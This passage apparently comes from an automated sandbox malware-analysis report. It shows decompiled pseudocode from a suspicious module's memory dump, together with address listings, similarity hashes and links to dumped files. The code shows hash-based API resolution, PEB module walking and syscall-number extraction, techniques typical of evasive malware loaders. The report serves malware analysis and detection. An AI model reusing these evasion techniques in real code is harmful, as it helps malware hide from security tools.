												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e7d9377
0x6e7d937b
0x6e7d9387
0x6e7d938b
0x6e7d938f
0x6e7d9394
0x6e7d9397
0x6e7d9399
0x6e7d939b
0x6e7d939b
0x6e7d939e
0x6e7d93a4
0x6e7d941c
0x6e7d9420
0x6e7d9423
0x6e7d9423
0x6e7d9426
0x00000000
0x6e7d9426
0x6e7d93ab
0x6e7d9413
0x6e7d9417
0x00000000
0x6e7d9417
0x6e7d93b2
0x6e7d940b
0x6e7d940e
0x00000000
0x6e7d940e
0x6e7d93b7
0x6e7d93f5
0x6e7d93fc
0x6e7d93ff
0x6e7d93c8
0x6e7d93c8
0x6e7d93ce
0x00000000
0x00000000
0x6e7d93d3
0x6e7d93ed
0x6e7d93f0
0x00000000
0x6e7d93f0
0x6e7d93d8
0x00000000
0x6e7d93da
0x6e7d93de
0x6e7d93e1
0x00000000
0x6e7d93e1
0x6e7d93d8
0x6e7d9429
0x6e7d9429
0x6e7d9429
0x6e7d9432
0x6e7d943b
0x6e7d943e
0x6e7d9441
0x6e7d9444
0x6e7d9447
0x6e7d944d
0x6e7d948f
0x6e7d9492
0x6e7d9493
0x6e7d949a
0x6e7d949d
0x6e7d944f
0x6e7d9453
0x6e7d945d
0x6e7d9464
0x6e7d9466
0x6e7d947f
0x6e7d9482
0x6e7d9482
0x6e7d9464
0x6e7d94a5
0x6e7d94a8
0x6e7d94ab
0x6e7d94af
0x6e7d94b3
0x6e7d94bd
0x6e7d94c1
0x6e7d94cb
0x6e7d94d4
0x6e7d94e1
0x6e7d94e4
0x6e7d94e7
0x6e7d94e7
0x6e7d94f3
0x6e7d94fe
0x6e7d9504
0x6e7d9508
0x6e7d94f5
0x6e7d94f5
0x6e7d94f5
0x6e7d9510
0x6e7d953a
0x6e7d9540
0x6e7d9540
0x6e7d9548
0x6e7d98f1
0x6e7d98f7
0x6e7d98fd
0x6e7d98fd
0x00000000
0x6e7d954e
0x6e7d954e
0x6e7d9552
0x6e7d9555
0x6e7d9558
0x6e7d955b
0x6e7d955f
0x6e7d9561
0x6e7d9564
0x6e7d9567
0x6e7d956b
0x6e7d9570
0x6e7d9573
0x6e7d9577
0x6e7d957c
0x6e7d957f
0x6e7d9581
0x6e7d9584
0x6e7d9588
0x6e7d958d
0x6e7d959d
0x6e7d95a3
0x6e7d95a3
0x6e7d95ab
0x6e7d95ad
0x6e7d95b6
0x6e7d95b8
0x6e7d95bb
0x6e7d95c6
0x6e7d95f3
0x6e7d95c8
0x6e7d95df
0x6e7d95df
0x6e7d95fb
0x6e7d9601
0x6e7d9607
0x6e7d9607
0x6e7d95fb
0x6e7d95b6
0x6e7d960e
0x6e7d967f
0x6e7d9684
0x6e7d96dd
0x6e7d979f
0x6e7d97a4
0x6e7d97b3
0x6e7d97b9
0x6e7d97bd
0x6e7d97c6
0x6e7d97cd
0x6e7d97d6
0x6e7d97e4
0x6e7d97e7
0x6e7d97cf
0x6e7d97cf
0x6e7d97cf
0x6e7d97cd
0x6e7d97f0
0x6e7d981d
0x6e7d9830
0x6e7d9838
0x6e7d981f
0x6e7d9821
0x6e7d9829
0x6e7d9829
0x6e7d97f2
0x6e7d97f7
0x6e7d9816
0x6e7d97f9
0x6e7d97fe
0x6e7d980f
0x6e7d9800
0x6e7d9800
0x6e7d9800
0x6e7d97fe
0x6e7d97f7
0x6e7d9840
0x6e7d984f
0x6e7d985c
0x6e7d9865
0x6e7d9869
0x6e7d986d
0x6e7d9870
0x6e7d9873
0x6e7d9876
0x6e7d9879
0x6e7d987c
0x6e7d9882
0x6e7d9886
0x6e7d988c
0x6e7d988c
0x6e7d9882
0x6e7d9892
0x6e7d98cf
0x6e7d98d3
0x6e7d98da
0x6e7d98e0
0x6e7d9894
0x6e7d9897
0x6e7d98b7
0x6e7d98bb
0x6e7d98c2
0x6e7d98c9
0x6e7d9899
0x6e7d989c
0x6e7d989e
0x6e7d98a2
0x6e7d98ac
0x6e7d98b2
0x6e7d98b2
0x6e7d989c
0x6e7d9897
0x6e7d98e7
0x6e7d98e7
0x6e7d9900
0x6e7d9900
0x6e7d9906
0x6e7d990b
0x6e7d9965
0x6e7d996a
0x6e7d99a9
0x6e7d99ae
0x6e7d99b0
0x6e7d99b4
0x6e7d99b7
0x6e7d99ba
0x6e7d99bc
0x6e7d99bd
0x6e7d99bd
0x6e7d99c2
0x6e7d99e0
0x6e7d99e2
0x6e7d99e6
0x6e7d99ec
0x6e7d99ef
0x6e7d99f1
0x6e7d99f2
0x6e7d99f2
0x00000000
0x6e7d99c4
0x6e7d99c4
0x6e7d99c4
0x6e7d99c8
0x6e7d99ce
0x6e7d99d1
0x6e7d99d3
0x6e7d99d6
0x6e7d99f5
0x6e7d99f5
0x6e7d99fc
0x6e7d9a16
0x6e7d99fe
0x6e7d99fe
0x6e7d9a0a
0x6e7d9a0b
0x6e7d9a0e
0x6e7d9a0e
0x6e7d9a24
0x6e7d9a24
0x6e7d99c2
0x6e7d996f
0x6e7d997d
0x6e7d9995
0x6e7d9999
0x6e7d999c
0x6e7d99a2
0x6e7d99a6
0x6e7d99a6
0x00000000
0x6e7d99a6
0x6e7d997f
0x6e7d9983
0x6e7d9989
0x6e7d9989
0x6e7d998f
0x00000000
0x6e7d998f
0x6e7d9971
0x6e7d9975
0x00000000
0x6e7d9975
0x6e7d990f
0x6e7d993b
0x6e7d9953
0x6e7d9957
0x6e7d995a
0x6e7d995d
0x6e7d995f
0x6e7d9962
0x6e7d993d
0x6e7d993d
0x6e7d9941
0x6e7d9944
0x6e7d9947
0x6e7d994a
0x6e7d994d
0x6e7d994d
0x00000000
0x6e7d993b
0x6e7d9915
0x00000000
0x00000000
0x6e7d991b
0x6e7d991f
0x6e7d9925
0x6e7d9928
0x6e7d992b
0x6e7d992e
0x00000000
0x6e7d992e
0x6e7d97a6
0x6e7d97aa
0x6e7d97b0
0x00000000
0x6e7d97b0
0x6e7d96e8
0x6e7d96fa
0x6e7d96ff
0x6e7d976a
0x00000000
0x00000000
0x6e7d9771
0x6e7d9797
0x6e7d979b
0x00000000
0x00000000
0x6e7d977a
0x6e7d977f
0x6e7d9793
0x00000000
0x00000000
0x00000000
0x6e7d9795
0x6e7d9786
0x00000000
0x00000000
0x6e7d978b
0x00000000
0x00000000
0x6e7d978d
0x00000000
0x6e7d9771
0x6e7d9701
0x6e7d970b
0x6e7d971c
0x6e7d971f
0x6e7d9722
0x6e7d9728
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d972e
0x6e7d972e
0x6e7d972e
0x6e7d9735
0x00000000
0x00000000
0x6e7d9737
0x6e7d973a
0x6e7d9740
0x00000000
0x00000000
0x00000000
0x6e7d9742
0x6e7d9744
0x6e7d974d
0x00000000
0x00000000
0x6e7d9761
0x00000000
0x00000000
0x00000000
0x6e7d9763
0x6e7d96ef
0x00000000
0x00000000
0x00000000
0x6e7d96f5
0x6e7d9689
0x6e7d96b8
0x6e7d96b9
0x6e7d96c2
0x00000000
0x6e7d96d3
0x00000000
0x6e7d96d3
0x6e7d9690
0x6e7d9693
0x6e7d96a6
0x6e7d96a7
0x6e7d96ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d9693
0x6e7d9689
0x6e7d9615
0x6e7d9672
0x6e7d9676
0x6e7d967c
0x00000000
0x6e7d967c
0x6e7d9617
0x6e7d961b
0x6e7d9628
0x6e7d962c
0x6e7d9642
0x6e7d964a
0x6e7d962e
0x6e7d9630
0x6e7d963a
0x6e7d963a
0x6e7d9650
0x6e7d9659
0x6e7d9670
0x00000000
0x00000000
0x00000000
0x6e7d9670
0x6e7d965b
0x6e7d965b
0x00000000
0x6e7d9650

Strings

, xrefs: 6E7D99DB

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 301772d650ec54f78f93b4392afdd22c4c57b449046221d4c03f4d28b2192d4f
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: EA22B03040C3868FD755CF95C6B136ABBE0BFA6310F00886DE8E55B2A5D3B59949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E7D143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E7D0304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e7dd208 == 0 ||  *0x6e7dd2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E7D4FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e7dd2f0 |  *0x6e7dd2f1;
									if(( *0x6e7dd2f0 |  *0x6e7dd2f1) == 0) {
										_t525 =  *0x6e7dd208; // 0x26a1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e7dd2f0 = 1;
											_t526 = E6E7D361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E7D1C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e7dd208 = _t526;
											 *0x6e7dd2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E7D361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E7D1C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E7CDFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E7CDFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e7dd20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e7dd210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E7CE8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E7D306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e7dd2e4 = 1;
					E6E7CF584( &(_t535[0x38]), 0);
					E6E7CF584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E7CF4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E7D306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E7CF828( &(_t535[0xc]), E6E7CF4CC( &(_t535[8])) + 0x14);
								_t369 = E6E7CF4BC( &(_t535[0xc]), E6E7CF4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E7CF654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E7CF584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E7CF654( &(_t535[8]));
							E6E7CF654( &(_t535[0x164]));
							E6E7CF584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E7CF584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E7D1D34(0x60a28c5c);
							_t290 = E6E7D12EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E7D1C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E7CD014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E7D5CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E7D5D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E7D8E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E7CF654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E7CBB44( &(_t535[0x110]));
							}
							E6E7CCFDC( &(_t535[0x104]));
							E6E7CCFDC(_t518);
							E6E7CCFDC( &(_t535[0x15c]));
							E6E7CCFDC( &(_t535[0x154]));
							E6E7D90EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E7CF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E7D90B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E7CF4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E7CF4CC( &(_t535[0x44]));
								_t519 =  *(0x6e7dbd40 + _t381 * 4);
								_t531 = E6E7D907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E7D87E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E7CF4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E7CF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E7CF4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E7CF828( &(_t535[0x20]), E6E7CF4CC( &(_t535[0x1c])) + 8);
										E6E7CF4BC( &(_t535[0x20]), E6E7CF4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E7D317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E7CF828( &(_t535[0x48]), _t535[0x70]);
									E6E7D317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E7CF840( &(_t535[0x44]), _t563);
									E6E7CF840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E7D913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E7D9104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E7CF654( &(_t535[0x144]));
									E6E7CF654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e7dd2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E7CF654( &(_t535[0x11c]));
							E6E7D8E68(_t381,  &(_t535[0xd8]));
							E6E7CF654( &(_t535[0x1c]));
							E6E7CF654( &(_t535[0x44]));
							E6E7CF654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E7CF4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E7CF828( &(_t535[0x38]), E6E7CF4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E7CF4BC( &(_t535[0x38]), E6E7CF4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E7CF4BC( &(_t535[0xc]), _t62);
						_t455 = E6E7CF4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e7d1448
0x6e7d144f
0x6e7d1452
0x6e7d1459
0x6e7d1bdb
0x6e7d1bdb
0x6e7d145f
0x6e7d146a
0x6e7d19a9
0x6e7d19ad
0x00000000
0x6e7d1c2c
0x6e7d19b3
0x6e7d19b6
0x6e7d19b9
0x6e7d19c3
0x6e7d19d2
0x6e7d19d4
0x6e7d19db
0x6e7d1bc5
0x6e7d1bc7
0x6e7d1bca
0x6e7d1bce
